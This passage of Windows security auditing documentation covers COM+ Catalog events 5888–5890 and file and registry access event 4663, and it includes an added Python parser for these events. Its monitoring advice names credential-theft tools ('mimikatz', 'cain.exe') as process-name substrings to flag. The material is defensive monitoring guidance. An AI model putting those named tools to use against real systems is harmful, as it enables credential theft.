PropertyInfo                   Retrieves information about the properties that a specified collection supports.
PublisherProperties            Contains an object for each publisher property for the parent SubscriptionsForComponent collection.
RelatedCollectionInfo          Retrieves information about other collections related to the collection from which it is called.
Roles                          Contains an object for each role assigned to the application to which it is related.
RolesForComponent              Contains an object for each role assigned to the component to which the collection is related.
RolesForInterface              Contains an object for each role assigned to the interface to which the collection is related.
RolesForMethod                 Contains an object for each role assigned to the method to which the collection is related.
RolesForPartition              Contains an object for each role assigned to the partition to which the collection is related.
Root                           Contains the top-level collections on the catalog.
SubscriberProperties           Contains an object for each subscriber property for the parent SubscriptionsForComponent collection.
SubscriptionsForComponent      Contains an object for each subscription for the parent Components collection.
TransientPublisherProperties   Contains an object for each publisher property for the parent TransientSubscriptions collection.
TransientSubscriberProperties  Contains an object for each subscriber property for the parent TransientSubscriptions collection.
TransientSubscriptions         Contains an object for each transient subscription.
UsersInPartitionRole           Contains an object for each user in the partition role to which the collection is related.
UsersInRole                    Contains an object for each user in the role to which the collection is related.
WOWInprocServers               Contains a list of the in-process servers registered with the system for 32-bit components on 64-bit computers.
WOWLegacyServers               Identical to the LegacyServers collection except that this collection is drawn from the 32-bit registry on 64-bit computers.

Object Name [Type = UnicodeString]: object-specific fields with the names and identifiers for the modified
object. It depends on COM+ Catalog Collection value, for example, if COM+ Catalog Collection =
Applications, then you can find that:
ID - A GUID representing the application. This property is returned when the Key property method is
called on an object of this collection.
AppPartitionID - A GUID representing the application partition ID.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Object Properties Modified [Type = UnicodeString]: the list of object’s (Object Name) properties which
were modified.
The items have the following format: Property_Name = ‘OLD_VALUE’ -> ‘NEW_VALUE’
Check description for specific COM+ Catalog Collection to see the list of object’s properties and
descriptions.

Security Monitoring Recommendations

For 5888(S): An object in the COM+ Catalog was modified.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a specific COM+ object for which you need to monitor all modifications, monitor all 5888 events with the corresponding Object Name.
5889(S): An object was deleted from the COM+ Catalog.
4/5/2019 • 6 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Object Access Events
Event Description:
This event generates when an object in the COM+ Catalog was deleted.
Although this event is listed under the Audit System Integrity subcategory, it is generated when this subcategory (Audit Other Object Access Events) is enabled.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5889</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12290</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-23T20:44:42.948569400Z" />
<EventRecordID>344998</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="4756" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectUserDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">222443</Data>
<Data Name="ObjectCollectionName">Applications</Data>
<Data Name="ObjectIdentifyingProperties">ID = {1D34B2DC-0E43-4040-BA7B-2F1C181FD86A} AppPartitionID =
{41E90F3E-56C1-4633-81C3-6E8BAC8BDD70}</Data>
<Data Name="ObjectProperties">Name = COMApp-New ApplicationProxyServerName = ProcessType = 2 CommandLine =
ServiceName = <null> RunAsUserType = 1 Identity = Interactive User Description = IsSystem = N Authentication =
4 ShutdownAfter = 3 RunForever = N Password = ******** Activation = Local Changeable = Y Deleteable = Y
CreatedBy = AccessChecksLevel = 1 ApplicationAccessChecksEnabled = 1 cCOL_SecurityDescriptor = <Opaque>
ImpersonationLevel = 3 AuthenticationCapability = 64 CRMEnabled = 0 3GigSupportEnabled = 0 QueuingEnabled = 0
QueueListenerEnabled = N EventsEnabled = 1 ProcessFlags = 0 ThreadMax = 0 ApplicationProxy = 0 CRMLogFile =
DumpEnabled = 0 DumpOnException = 0 DumpOnFailfast = 0 MaxDumpCount = 5 DumpPath =
%systemroot%\system32\com\dmp IsEnabled = 1 AppPartitionID = {41E90F3E-56C1-4633-81C3-6E8BAC8BDD70}
ConcurrentApps = 1 RecycleLifetimeLimit = 0 RecycleCallLimit = 0 RecycleActivationLimit = 0 RecycleMemoryLimit
= 0 RecycleExpirationTimeout = 15 QCListenerMaxThreads = 0 QCAuthenticateMsgs = 0 ApplicationDirectory =
SRPTrustLevel = 262144 SRPEnabled = 0 SoapActivated = 0 SoapVRoot = SoapMailTo = SoapBaseUrl = Replicable =
1</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “delete object” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID ) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.
Account Name [Type = UnicodeString]: the name of the account that requested the “delete object”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
COM+ Catalog Collection [Type = UnicodeString]: the name of COM+ collection in which COM+ object was
deleted. Here is the list of possible collection values with descriptions:

COLLECTION                     DESCRIPTION
ApplicationCluster             Contains a list of the servers in the application cluster.
ApplicationInstances           Contains an object for each instance of a running COM+ application.
Applications                   Contains an object for each COM+ application installed on the local computer.
Components                     Contains an object for each component in the application to which it is related.
ComputerList                   Contains a list of the computers found in the Computers folder of the Component Services administration tool.
DCOMProtocols                  Contains a list of the protocols to be used by DCOM. It contains an object for each protocol.
ErrorInfo                      Retrieves extended error information regarding methods that deal with multiple objects.
EventClassesForIID             Retrieves information regarding event classes.
FilesForImport                 Retrieves information from its MSI file about an application that can be imported.
InprocServers                  Contains a list of the in-process servers registered with the system. It contains an object for each component.
InterfacesForComponent         Contains an object for each interface exposed by the component to which the collection is related.
LegacyComponents               Contains an object for each unconfigured component in the application to which it is related.
LegacyServers                  Identical to the InprocServers collection except that this collection also includes local servers.
LocalComputer                  Contains a single object that holds computer level settings information for the computer whose catalog you are accessing.
MethodsForInterface            Contains an object for each method on the interface to which the collection is related.
Partitions                     Used to specify the applications contained in each partition.
PartitionUsers                 Used to specify the users contained in each partition.
PropertyInfo                   Retrieves information about the properties that a specified collection supports.
PublisherProperties            Contains an object for each publisher property for the parent SubscriptionsForComponent collection.
RelatedCollectionInfo          Retrieves information about other collections related to the collection from which it is called.
Roles                          Contains an object for each role assigned to the application to which it is related.
RolesForComponent              Contains an object for each role assigned to the component to which the collection is related.
RolesForInterface              Contains an object for each role assigned to the interface to which the collection is related.
RolesForMethod                 Contains an object for each role assigned to the method to which the collection is related.
RolesForPartition              Contains an object for each role assigned to the partition to which the collection is related.
Root                           Contains the top-level collections on the catalog.
SubscriberProperties           Contains an object for each subscriber property for the parent SubscriptionsForComponent collection.
SubscriptionsForComponent      Contains an object for each subscription for the parent Components collection.
TransientPublisherProperties   Contains an object for each publisher property for the parent TransientSubscriptions collection.
TransientSubscriberProperties  Contains an object for each subscriber property for the parent TransientSubscriptions collection.
TransientSubscriptions         Contains an object for each transient subscription.
UsersInPartitionRole           Contains an object for each user in the partition role to which the collection is related.
UsersInRole                    Contains an object for each user in the role to which the collection is related.
WOWInprocServers               Contains a list of the in-process servers registered with the system for 32-bit components on 64-bit computers.
WOWLegacyServers               Identical to the LegacyServers collection except that this collection is drawn from the 32-bit registry on 64-bit computers.

Object Name [Type = UnicodeString]: object-specific fields with the names and identifiers for the deleted
object. It depends on COM+ Catalog Collection value, for example, if COM+ Catalog Collection =
Applications, then you can find that:
ID - A GUID representing the application. This property is returned when the Key property method is
called on an object of this collection.
AppPartitionID - A GUID representing the application partition ID.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Object Details [Type = UnicodeString]: the list of deleted object’s (Object Name) properties.
The items have the following format: Property_Name = VALUE
Check description for specific COM+ Catalog Collection to see the list of object’s properties and
descriptions.

Security Monitoring Recommendations

For 5889(S): An object was deleted from the COM+ Catalog.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a specific COM+ object for which you need to monitor all modifications (especially delete operations), monitor all 5889 events with the corresponding Object Name.
5890(S): An object was added to the COM+ Catalog.
4/5/2019 • 5 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Object Access Events
Event Description:
This event generates when a new object was added to the COM+ Catalog.
Although this event is listed under the Audit System Integrity subcategory, it is generated when this subcategory (Audit Other Object Access Events) is enabled.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5890</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12290</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-23T19:45:04.239886800Z" />
<EventRecordID>344980</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="2856" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectUserDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">222443</Data>
<Data Name="ObjectCollectionName">Roles</Data>
<Data Name="ObjectIdentifyingProperties">ApplId = {1D34B2DC-0E43-4040-BA7B-2F1C181FD86A} Name =
CreatorOwner</Data>
<Data Name="ObjectProperties">Description =</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “add object” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID ) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “add object”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
COM+ Catalog Collection [Type = UnicodeString]: the name of COM+ collection to which the new object
was added. Here is the list of possible collection values with descriptions:

COLLECTION                     DESCRIPTION
ApplicationCluster             Contains a list of the servers in the application cluster.
ApplicationInstances           Contains an object for each instance of a running COM+ application.
Applications                   Contains an object for each COM+ application installed on the local computer.
Components                     Contains an object for each component in the application to which it is related.
ComputerList                   Contains a list of the computers found in the Computers folder of the Component Services administration tool.
DCOMProtocols                  Contains a list of the protocols to be used by DCOM. It contains an object for each protocol.
ErrorInfo                      Retrieves extended error information regarding methods that deal with multiple objects.
EventClassesForIID             Retrieves information regarding event classes.
FilesForImport                 Retrieves information from its MSI file about an application that can be imported.
InprocServers                  Contains a list of the in-process servers registered with the system. It contains an object for each component.
InterfacesForComponent         Contains an object for each interface exposed by the component to which the collection is related.
LegacyComponents               Contains an object for each unconfigured component in the application to which it is related.
LegacyServers                  Identical to the InprocServers collection except that this collection also includes local servers.
LocalComputer                  Contains a single object that holds computer level settings information for the computer whose catalog you are accessing.
MethodsForInterface            Contains an object for each method on the interface to which the collection is related.
Partitions                     Used to specify the applications contained in each partition.
PartitionUsers                 Used to specify the users contained in each partition.
PropertyInfo                   Retrieves information about the properties that a specified collection supports.
PublisherProperties            Contains an object for each publisher property for the parent SubscriptionsForComponent collection.
RelatedCollectionInfo          Retrieves information about other collections related to the collection from which it is called.
Roles                          Contains an object for each role assigned to the application to which it is related.
RolesForComponent              Contains an object for each role assigned to the component to which the collection is related.
RolesForInterface              Contains an object for each role assigned to the interface to which the collection is related.
RolesForMethod                 Contains an object for each role assigned to the method to which the collection is related.
RolesForPartition              Contains an object for each role assigned to the partition to which the collection is related.
Root                           Contains the top-level collections on the catalog.
SubscriberProperties           Contains an object for each subscriber property for the parent SubscriptionsForComponent collection.
SubscriptionsForComponent      Contains an object for each subscription for the parent Components collection.
TransientPublisherProperties   Contains an object for each publisher property for the parent TransientSubscriptions collection.
TransientSubscriberProperties  Contains an object for each subscriber property for the parent TransientSubscriptions collection.
TransientSubscriptions         Contains an object for each transient subscription.
UsersInPartitionRole           Contains an object for each user in the partition role to which the collection is related.
UsersInRole                    Contains an object for each user in the role to which the collection is related.
WOWInprocServers               Contains a list of the in-process servers registered with the system for 32-bit components on 64-bit computers.
WOWLegacyServers               Identical to the LegacyServers collection except that this collection is drawn from the 32-bit registry on 64-bit computers.

Object Name [Type = UnicodeString]: object-specific fields with the names and identifiers for the new
object. It depends on COM+ Catalog Collection value, for example, if COM+ Catalog Collection =
Applications, then you can find that:
ID - A GUID representing the application. This property is returned when the Key property method
is called on an object of this collection.
AppPartitionID - A GUID representing the application partition ID.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Object Details [Type = UnicodeString]: the list of new object’s (Object Name) properties.
The items have the following format: Property_Name = VALUE
Check description for specific COM+ Catalog Collection to see the list of object’s properties and
descriptions.

Security Monitoring Recommendations

For 5890(S): An object was added to the COM+ Catalog.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you need to monitor for creation of new COM+ objects within a specific COM+ collection, monitor all 5890 events with the corresponding COM+ Catalog Collection field value.
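The three COM+ Catalog events share one value format for Object Name and Object Details (Property_Name = VALUE), with 5888 adding the 'OLD_VALUE' -> 'NEW_VALUE' form for modified properties. The following Python script is an added example, not part of the original documentation: it parses these fields from 5888, 5889 and 5890 events and applies the three monitoring recommendations above (a watched Object Name for 5888 and 5889, a watched collection for 5890). The sample events are constructed from the values shown in the event XML of the three articles.

```python
"""Normalize COM+ Catalog audit events 5888 (modified), 5889 (deleted) and
5890 (added) and apply the monitoring recommendations: watch a specific
Object Name (identifying properties) for 5888/5889, a collection for 5890."""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
# A property key is a run of non-space characters followed by " =" and then a
# space or the end of the string; values may be empty or contain spaces.
_KEY = re.compile(r"(\S+) =(?=\s|$)")


def parse_properties(text):
    """Parse 'Name = VALUE Name2 = VALUE2' into a dict in order of appearance.
    A value whose own token is followed by ' =' would be mistaken for a key;
    none of the documented samples do that."""
    keys = list(_KEY.finditer(text))
    props = {}
    for i, m in enumerate(keys):
        end = keys[i + 1].start() if i + 1 < len(keys) else len(text)
        props[m.group(1)] = text[m.end():end].strip()
    return props


def parse_modifications(text):
    """5888 format Property_Name = 'OLD_VALUE' -> 'NEW_VALUE'; returns {name: (old, new)}.
    A value without the arrow is kept as (value, None)."""
    out = {}
    for name, value in parse_properties(text).items():
        old, sep, new = value.partition(" -> ")
        out[name] = (old.strip("'"), new.strip("'")) if sep else (value, None)
    return out


def com_catalog_record(event_xml):
    """Return a flat record for a 5888/5889/5890 event, or None for other events."""
    root = ET.fromstring(event_xml)
    eid = root.findtext(f"{EVT_NS}System/{EVT_NS}EventID")
    if eid not in ("5888", "5889", "5890"):
        return None
    data = {d.get("Name"): (d.text or "") for d in root.iter(EVT_NS + "Data")}
    rec = {
        "event_id": eid,
        "subject": data.get("SubjectUserDomainName", "") + "\\" + data.get("SubjectUserName", ""),
        "collection": data.get("ObjectCollectionName", ""),
        "object_name": parse_properties(data.get("ObjectIdentifyingProperties", "")),
    }
    if eid == "5888":
        rec["modified"] = parse_modifications(data.get("ModifiedObjectProperties", ""))
    else:
        rec["details"] = parse_properties(data.get("ObjectProperties", ""))
    return rec


def matches_watchlist(rec, watched_objects, watched_collections):
    """watched_objects: dicts with 'collection' plus identifying properties
    (e.g. 'ID'); watched_collections: collection names that matter for 5890."""
    if rec["event_id"] == "5890":
        return rec["collection"] in watched_collections
    for w in watched_objects:
        if w["collection"] != rec["collection"]:
            continue
        if all(rec["object_name"].get(k) == v for k, v in w.items() if k != "collection"):
            return True
    return False


def make_event(event_id, fields):
    """Constructed sample event in the Security channel XML shape (not captured)."""
    body = "".join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
            f"<System><EventID>{event_id}</EventID><Channel>Security</Channel></System>"
            f"<EventData>{body}</EventData></Event>")


APP_ID = "{1D34B2DC-0E43-4040-BA7B-2F1C181FD86A}"   # values from the sample events above
PART_ID = "{41E90F3E-56C1-4633-81C3-6E8BAC8BDD70}"
COMMON = {"SubjectUserName": "dadmin", "SubjectUserDomainName": "CONTOSO"}

# Constructed samples built from the documented 5888/5889/5890 field values.
EVENT_5888 = make_event("5888", {**COMMON,
    "ObjectCollectionName": "Applications",
    "ObjectIdentifyingProperties": f"ID = {APP_ID} AppPartitionID = {PART_ID}",
    "ModifiedObjectProperties": "Name = 'COMApp' -> 'COMApp-New' "
                                "cCOL_SecurityDescriptor = '<Opaque>' -> '<Opaque>'"})
EVENT_5889 = make_event("5889", {**COMMON,
    "ObjectCollectionName": "Applications",
    "ObjectIdentifyingProperties": f"ID = {APP_ID} AppPartitionID = {PART_ID}",
    "ObjectProperties": "Name = COMApp-New ApplicationProxyServerName = ProcessType = 2 "
                        "ServiceName = <null> Identity = Interactive User Description = Password = ********"})
EVENT_5890 = make_event("5890", {**COMMON,
    "ObjectCollectionName": "Roles",
    "ObjectIdentifyingProperties": f"ApplId = {APP_ID} Name = CreatorOwner",
    "ObjectProperties": "Description ="})

WATCHED_OBJECTS = [{"collection": "Applications", "ID": APP_ID}]
WATCHED_COLLECTIONS = {"Roles"}

if __name__ == "__main__":
    for ev in (EVENT_5888, EVENT_5889, EVENT_5890):
        rec = com_catalog_record(ev)
        print(rec["event_id"], matches_watchlist(rec, WATCHED_OBJECTS, WATCHED_COLLECTIONS), rec)
```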
Audit Registry
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Registry allows you to audit attempts to access registry objects. A security audit event is generated only
for objects that have system access control lists (SACLs) specified, and only if the type of access requested,
such as Read, Write, or Modify, and the account making the request match the settings in the SACL.
If success auditing is enabled, an audit entry is generated each time any account successfully accesses a
registry object that has a matching SACL. If failure auditing is enabled, an audit entry is generated each time
any user unsuccessfully attempts to access a registry object that has a matching SACL.
Event volume: Low to Medium, depending on how registry SACLs are configured.

COMPUTER TYPE       GENERAL SUCCESS   GENERAL FAILURE   STRONGER SUCCESS   STRONGER FAILURE   COMMENTS
Domain Controller   IF                IF                IF                 IF                 See comment below.
Member Server       IF                IF                IF                 IF
Workstation         IF                IF                IF                 IF

Comment (Domain Controller row): We strongly recommend that you develop a Registry Objects Security Monitoring policy and define appropriate SACLs for registry objects for different operating system templates and roles. Do not enable this subcategory if you have not planned how to use and analyze the collected information. It is also important to delete non-effective, excess SACLs. Otherwise the auditing log will be overloaded with useless information. Failure events can show you unsuccessful attempts to access specific registry objects. Consider enabling this subcategory for critical computers first, after you develop a Registry Objects Security Monitoring policy for them.

Events List:
4663(S): An attempt was made to access an object.
4656(S, F): A handle to an object was requested.
4658(S): The handle to an object was closed.
4660(S): An object was deleted.
4657(S): A registry value was modified.
5039(-): A registry key was virtualized.
4670(S): Permissions on an object were changed.
4663(S): An attempt was made to access an object.
4/5/2019 • 8 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Kernel Object, Audit Registry, and Audit Removable Storage
Event Description:
This event indicates that a specific operation was performed on an object. The object could be a file system, kernel, or registry object, or a file system object on removable storage or a device.
This event generates only if the object’s SACL contains an ACE that audits the specific access right that was used.
The main difference from the “4656: A handle to an object was requested.” event is that 4663 shows that an access right was actually used rather than just requested, and 4663 has no Failure events.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4663</EventID>
    <Version>1</Version>
    <Level>0</Level>
    <Task>12800</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-18T22:13:54.770429700Z" />
    <EventRecordID>273866</EventRecordID>
    <Correlation />
    <Execution ProcessID="516" ThreadID="524" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x4367b</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="ObjectType">File</Data>
    <Data Name="ObjectName">C:\Documents\HBI Data.txt</Data>
    <Data Name="HandleId">0x1bc</Data>
    <Data Name="AccessList">%%4417 %%4418</Data>
    <Data Name="AccessMask">0x6</Data>
    <Data Name="ProcessId">0x458</Data>
    <Data Name="ProcessName">C:\Windows\System32\notepad.exe</Data>
    <Data Name="ResourceAttributes">S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions:
0 - Windows Server 2008, Windows Vista.
1 - Windows Server 2012, Windows 8.
Added “Resource Attributes” field.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made an attempt to access an object. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory
domain controller, and stored in a security database. Each time a user logs on, the system retrieves the
SID for that user from the database and places it in the access token for that user. The system uses the
SID in the access token to identify the user in all subsequent interactions with Windows security. When a
SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify
another user or group. For more information about SIDs, see Security identifiers.
Account Name [Type = UnicodeString]: the name of the account that made an attempt to access an
object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and
include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS
LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this
account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent
events that might contain the same Logon ID, for example, “4624: An account was successfully logged
on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of object that was accessed during the operation.
The most common Object Types are:
DIRECTORY, EVENT, TIMER, DEVICE, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port

Object Name [Type = UnicodeString]: name and other identifying information for the object for
which access was requested. For example, for a file, the path would be included.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can be used
for correlation with other events, for example with Handle ID field in “4656(S, F): A handle to an
object was requested.” This parameter might not be captured in the event, and in that case appears as
“0x0”.
Resource Attributes [Type = UnicodeString] [Version 1]: attributes associated with the object. For
some objects, the field does not apply and “-“ is displayed.
For example, for a file, the following might be displayed: S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))
Impact_MS: Resource Property ID.
3000: Resource Property Value.

Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that accessed the object. Process
ID (PID) is a number used by the operating system to uniquely identify an active process. To see the
PID for a specific process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new
process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Access Request Information:
Accesses [Type = UnicodeString]: the list of access rights which were used by Subject\Security ID.
These access rights depend on Object Type. The following table contains information about the most
common access rights for file system objects. Access rights for registry objects are often similar to file
system objects, but the table contains a few notes about how they vary.

Format of each entry: Access name, then "Hex value, schema value", then the description.

ReadData (or ListDirectory)
  Hex value, schema value: 0x1, %%4416
  (For registry objects, this is “Query key value.”)
  ReadData - For a file object, the right to read the corresponding file data. For a directory object, the right to read the corresponding directory data.
  ListDirectory - For a directory, the right to list the contents of the directory.

WriteData (or AddFile)
  Hex value, schema value: 0x2, %%4417
  (For registry objects, this is “Set key value.”)
  WriteData - For a file object, the right to write data to the file. For a directory object, the right to create a file in the directory (FILE_ADD_FILE).
  AddFile - For a directory, the right to create a file in the directory.

AppendData (or AddSubdirectory or CreatePipeInstance)
  Hex value, schema value: 0x4, %%4418
  AppendData - For a file object, the right to append data to the file. (For local files, write operations will not overwrite existing data if this flag is specified without FILE_WRITE_DATA.) For a directory object, the right to create a subdirectory (FILE_ADD_SUBDIRECTORY).
  AddSubdirectory - For a directory, the right to create a subdirectory.
  CreatePipeInstance - For a named pipe, the right to create a pipe.

ReadEA
  Hex value, schema value: 0x8, %%4419
  (For registry objects, this is “Enumerate sub-keys.”)
  The right to read extended file attributes.

WriteEA
  Hex value, schema value: 0x10, %%4420
  The right to write extended file attributes.

Execute/Traverse
  Hex value, schema value: 0x20, %%4421
  Execute - For a native code file, the right to execute the file. This access right given to scripts may cause the script to be executable, depending on the script interpreter.
  Traverse - For a directory, the right to traverse the directory. By default, users are assigned the BYPASS_TRAVERSE_CHECKING privilege, which ignores the FILE_TRAVERSE access right. See the remarks in File Security and Access Rights for more information.

DeleteChild
  Hex value, schema value: 0x40, %%4422
  For a directory, the right to delete a directory and all the files it contains, including read-only files.

ReadAttributes
  Hex value, schema value: 0x80, %%4423
  The right to read file attributes.

WriteAttributes
  Hex value, schema value: 0x100, %%4424
  The right to write file attributes.

DELETE
  Hex value, schema value: 0x10000, %%1537
  The right to delete the object.

READ_CONTROL
  Hex value, schema value: 0x20000, %%1538
  The right to read the information in the object's security descriptor, not including the information in the system access control list (SACL).

WRITE_DAC
  Hex value, schema value: 0x40000, %%1539
  The right to modify the discretionary access control list (DACL) in the object's security descriptor.

WRITE_OWNER
  Hex value, schema value: 0x80000, %%1540
  The right to change the owner in the object's security descriptor.

SYNCHRONIZE
  Hex value, schema value: 0x100000, %%1541
  The right to use the object for synchronization. This enables a thread to wait until the object is in the signaled state. Some object types do not support this access right.

ACCESS_SYS_SEC
  Hex value, schema value: 0x1000000, %%1542
  The ACCESS_SYS_SEC access right controls the ability to get or set the SACL in an object's security descriptor.

Table 15. File System objects access rights.

Access Mask [Type = HexInt32]: hexadecimal mask for the requested or performed operation. For more
information, see the preceding table.

Security Monitoring Recommendations


For 4663(S): An attempt was made to access an object.
For kernel objects, this event and other auditing events have little to no security relevance and are hard to
parse or analyze. There is no recommendation for auditing them, unless you know exactly what you need to
monitor at the Kernel objects level.
For other types of objects, the following recommendations apply.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit
events.
If you have critical file system objects for which you need to monitor all access attempts, monitor this
event for Object Name.
If you have critical file system objects for which you need to monitor certain access attempts (for
example, write actions), monitor this event for Object Name in relation to Access Request
Information\Accesses.
If you have file system objects with specific attributes, for which you need to monitor access attempts,
monitor this event for Resource Attributes.
If Object Name is a sensitive or critical registry key for which you need to monitor specific access
attempts (for example, only write actions), monitor for all 4663 events with the corresponding Access
Request Information\Accesses.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events
with “Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32
or Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example,
“mimikatz” or “cain.exe”), check for these substrings in “Process Name.”
For file system objects, we recommend that you monitor for these Access Request
Information\Accesses rights:
WriteData (or AddFile)
